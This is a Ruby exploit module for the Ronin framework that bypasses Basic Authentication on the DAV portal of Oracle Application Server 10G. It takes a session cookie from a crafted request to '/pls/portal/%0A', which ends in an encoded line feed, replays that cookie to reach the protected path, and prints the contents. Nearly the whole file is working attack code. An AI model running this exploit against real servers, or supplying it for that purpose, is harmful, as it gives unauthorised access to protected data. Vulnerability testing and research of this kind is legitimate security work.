#!/usr/bin/env ronin-exploit -f

require 'ronin/exploits/http'

Ronin::Exploits::HTTP.object do

  # Descriptive metadata for this check: title, revision, summary, license
  # and author. Nothing in this block touches the network.
  cache do
    self.name = 'Oracle Application Server 10G ORA DAV Basic Authentication Bypass Vulnerability'
    self.version = '0.1'
    self.description = %{
This module sends tests for the Oracle Application Server 10G ORA DAV
Basic Authentication Bypass Vulnerability.
}

    licensed_under :mit

    author :name => 'CG', :organization => 'carnal0wnage'
  end

  # Fixes the two request paths used by the check.
  build do
    # Path that is expected to answer 401 when no credentials are supplied.
    @dav_path = '/dav_portal/portal/'
    # Portal path requested without credentials; it ends in a URL-encoded
    # line feed (%0A).
    @guest_path = '/pls/portal/%0A'
  end

  # Runs the check in three steps:
  #   1. confirm that @dav_path answers 401 without credentials;
  #   2. request @guest_path and keep any Set-Cookie value it returns;
  #   3. request @dav_path again, presenting that cookie.
  # A 200 in step 3 means the server accepted, for a path that had just
  # answered 401, a cookie that was issued to a request carrying no
  # credentials. That is the finding this script reports.
  deploy do
    print_info "Testing for dav_portal authentication required"

    # Baseline: without a 401 here there is no authentication to bypass,
    # so the check stops instead of reporting a meaningless result.
    # NOTE(review): the status is compared to an Integer here and to the
    # String '200' below; presumably http_status converts it (confirm).
    dav_status = http_status(:path => @dav_path)
    deploy_failed!("Did not receive a HTTP 401 response: #{@dav_path}") unless dav_status == 401

    print_info "Sending the bypass request ..."

    @res = http_get(:path => @guest_path)
    deploy_failed!("Did not receive a HTTP 200 response: #{@guest_path}") unless @res.code == '200'

    # NOTE(review): when the response has no Set-Cookie header, @cookie is
    # nil and the replay below is still sent with a nil cookie value.
    @cookie = @res.headers['Set-Cookie']
    print_debug("Received Cookie: %s", @cookie) if @cookie

    print_info "Replaying the HTTP Request with Cookie ..."

    replay_headers = {
      :cookie => @cookie,
      :connection => 'keep-alive'
    }
    @res = http_get(:path => @dav_path, :headers => replay_headers)

    if @res.code != '200'
      # Print the response headers so the operator can see why the replay
      # was refused before the failure is raised.
      @res.headers.each do |field, content|
        puts "#{field}: #{content}"
      end

      deploy_failed! "Could not replay HTTP Request for #{@dav_path}"
    end

    # The body comes from the remote server and is written to stdout
    # unmodified; treat it as untrusted content when capturing the output.
    print_info "Response body:"
    puts @res.body
  end

end